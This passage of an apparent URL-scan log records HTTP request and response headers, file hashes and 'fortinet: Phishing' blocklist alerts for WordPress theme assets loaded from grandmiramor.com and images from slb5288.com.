TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
vary: Accept-Encoding
x-powered-by: PHP/7.4.21
link: <https://grandmiramor.com/wp-json/>; rel="https://api.w.org/"
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   28742
Md5:    33cead7a42e282b9c90596607e010ccf
Sha1:   2391397faf2ed518b07b673831f13d46c4f309bd
Sha256: 91438a591715cbf1d6ffc33f48b5ce330e756a47766bd6fb52b3b386ffd0a861

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/themes/educenter/assets/library/fontawesome/css/all.min.css?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-de0a"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   20360
Md5:    58ff3cca67e34f75978a4919526303c5
Sha1:   3335de266ff7080af99af43475118eac08d24b34
Sha256: c4df5b209d7fd80c36c50d5b25b30f48391b235025034a8277c08a0045283516

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /go/images/1614078011374776.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:13 GMT
Content-Length: 10367
Last-Modified: Fri, 04 Jun 2021 09:38:24 GMT
Connection: keep-alive
ETag: "60b9f490-287f"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 226 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   10367
Md5:    7a32726b8d61cfc3aaf74099138a941d
Sha1:   a350df2e64714d2ce06bd81caf8abbe736abdb00
Sha256: 9868621bfc45ed46a1db362155308ed9dfaf74ebf67de95a94e9f94e32ad704c
                                        
                                            GET /go/images/bvi_footer.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:13 GMT
Content-Length: 2438
Last-Modified: Fri, 04 Jun 2021 09:17:04 GMT
Connection: keep-alive
ETag: "60b9ef90-986"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 156 x 37, 8-bit colormap, non-interlaced\012- data
Size:   2438
Md5:    148b5e04990558a40ea48f236eb643bb
Sha1:   86c6b16cc0f8829fed3a39dd09b7fff826c63b12
Sha256: d9d87f7cdd09a2a3947525882727b0d5b4dfa7092e32a5fcd8ae08dd7bb27f5e
                                        
GET /css?family=Roboto+Condensed%3A300%2C300i%2C400%2C400i%2C700%7CRoboto%3A300%2C400%2C500%2C700%7CLato%3A300%2C400%2C500%2C700&subset=latin%2Clatin-ext HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Thu, 24 Nov 2022 15:13:09 GMT
date: Thu, 24 Nov 2022 15:13:09 GMT
cache-control: private, max-age=86400
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   1405
Md5:    96daef8fcf85c7b660148dd556747fd9
Sha1:   14af5e672044c3f1b3f04bbcb6c92720d2d7543f
Sha256: cf1ac17bc5f07e49ffaccc8820e31e02ff3b9cb67f69d45133d73df0f09d96e1
                                        
GET /wp-content/themes/educenter/assets/library/lightslider/css/lightslider.min.css?ver=6.1.1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: text/css
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-159e"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   3758
Md5:    1bbb0d1a470fc86f79ee0462f18d4892
Sha1:   fe6770636e6b8cb52fa92d016e861a13d2222406
Sha256: ef8ede0b80b7b38ebd26d964508248d7b27c9a1c960e478f880730f51d5161bb
                                        
GET /wp-content/themes/educenter/assets/library/prettyphoto/css/prettyPhoto.css?ver=6.1.1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: text/css
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-6a18"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   5691
Md5:    df9b848eee6ade6bb57726a6018a25cc
Sha1:   7423654ed7447954e166ff9a22435b678844a2a1
Sha256: 205990af998b9130984aa54f5fd3c562c6dff0b68ed7c593a1b7c79504783ccb

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/educenter/style.css?ver=6.1.1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: text/css
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-1bbba"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   123125
Md5:    547422487914ebaaee6e0f081066750d
Sha1:   1d41882ce803e745a9194a84bb9603e081be292b
Sha256: 398dd45ae7b9d5149917b8f85415abf0a0e3e13c33671d3006cae749f0aa3259

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/educenter/sparklethemes/mobile-menu/navigation.js?ver=1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-5acc"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-includes/js/wp-emoji-release.min.js?ver=6.1.1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 20:26:39 GMT
vary: Accept-Encoding
etag: W/"636180ff-48b9"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /favicon.ico HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Cookie: Hm_lvt_14c80326baa455e60c7d9ecfd2eeb6be=1669302791; Hm_lpvt_14c80326baa455e60c7d9ecfd2eeb6be=1669302791; Hm_lvt_156b2b1f9196a3c767b14e29e3c17dfb=1669302791; Hm_lpvt_156b2b1f9196a3c767b14e29e3c17dfb=1669302791
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
server: nginx
date: Thu, 24 Nov 2022 15:13:12 GMT
location: https://grandmiramor.com/wp-includes/images/w-logo-blue-white-bg.png
x-powered-by: PHP/7.4.21
link: <https://grandmiramor.com/wp-json/>; rel="https://api.w.org/"
x-redirect-by: WordPress
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /wp-content/themes/educenter/assets/library/prettyphoto/js/jquery.prettyPhoto.js?ver=3.1.6 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-89e0"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/educenter/assets/js/educenter-custom.js?ver=20151215 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-23c0"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Wed, 02 Nov 2022 08:36:11 GMT
vary: Accept-Encoding
etag: W/"63622bfb-15e54"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:14:35 GMT
vary: Accept-Encoding
etag: W/"6360d56b-2bd8"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/educenter/assets/library/lightslider/js/lightslider.min.js?ver=1.1.6 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-3e97"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/educenter/assets/library/theia-sticky-sidebar/js/theia-sticky-sidebar.min.js?ver=1.6.0 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-141b"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /wp-content/themes/educenter/sparklethemes/mobile-menu/mobile-menu.css?ver=1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: text/css
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-1164"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /wp-content/themes/educenter/assets/css/responsive.css?ver=6.1.1 HTTP/1.1
Host: grandmiramor.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
156.240.38.111
HTTP/2 200 OK
content-type: text/css
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-3c9b"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing